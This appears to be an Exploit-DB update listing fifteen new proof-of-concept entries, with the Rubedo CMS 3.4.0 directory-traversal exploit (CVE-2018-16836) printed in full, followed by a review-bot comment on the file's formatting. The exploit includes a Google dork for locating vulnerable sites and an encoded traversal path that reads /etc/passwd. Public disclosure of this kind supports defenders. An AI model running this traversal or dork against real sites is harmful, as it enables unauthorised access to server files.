
15 changes to exploits/shellcodes

jiNa OCR Image to Text 1.0 - Denial of Service (PoC)
PixGPS 1.1.8 - Denial of Service (PoC)
RoboImport 1.2.0.72 - Denial of Service (PoC)
PicaJet FX 2.6.5 - Denial of Service (PoC)
iCash 7.6.5 - Denial of Service (PoC)
PDF Explorer 1.5.66.2 - Denial of Service (PoC)
Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC)
Apple macOS 10.13.4 - Denial of Service (PoC)
CirCarLife SCADA 4.3.0 - Credential Disclosure
Rubedo CMS 3.4.0 - Directory Traversal
SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)
SynaMan 4.0 build 1488 - SMTP Credential Disclosure
IBM Identity Governance and Intelligence 5.2.3.2 / 5.2.4 - SQL Injection
MyBB 1.8.17 - Cross-Site Scripting
LG Smart IP Camera 1508190 - Backup File Download
# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal
# Google Dork: intext:rubedo.current.page.description
# Date: 2018-09-11
# Exploit Author: Marouene Boubakri
# Vendor Homepage: https://www.rubedo-project.org
# Version: through 3.4.0
# Tested on: Linux
# CVE : CVE-2018-16836

# PoC:
# Read /etc/passwd file from remote server

/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'
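Review bot: the path on the last line ends with a single quote after /etc/passwd that none of the header comments explain, and the file is recorded with no trailing newline; state whether the quote belongs to the request or drop it, and end the file with a newline. The header gives the CVE and "Version: through 3.4.0" but no reference to a vendor advisory or fixed release, which anyone triaging this entry needs in order to decide on remediation; add a reference line if one exists.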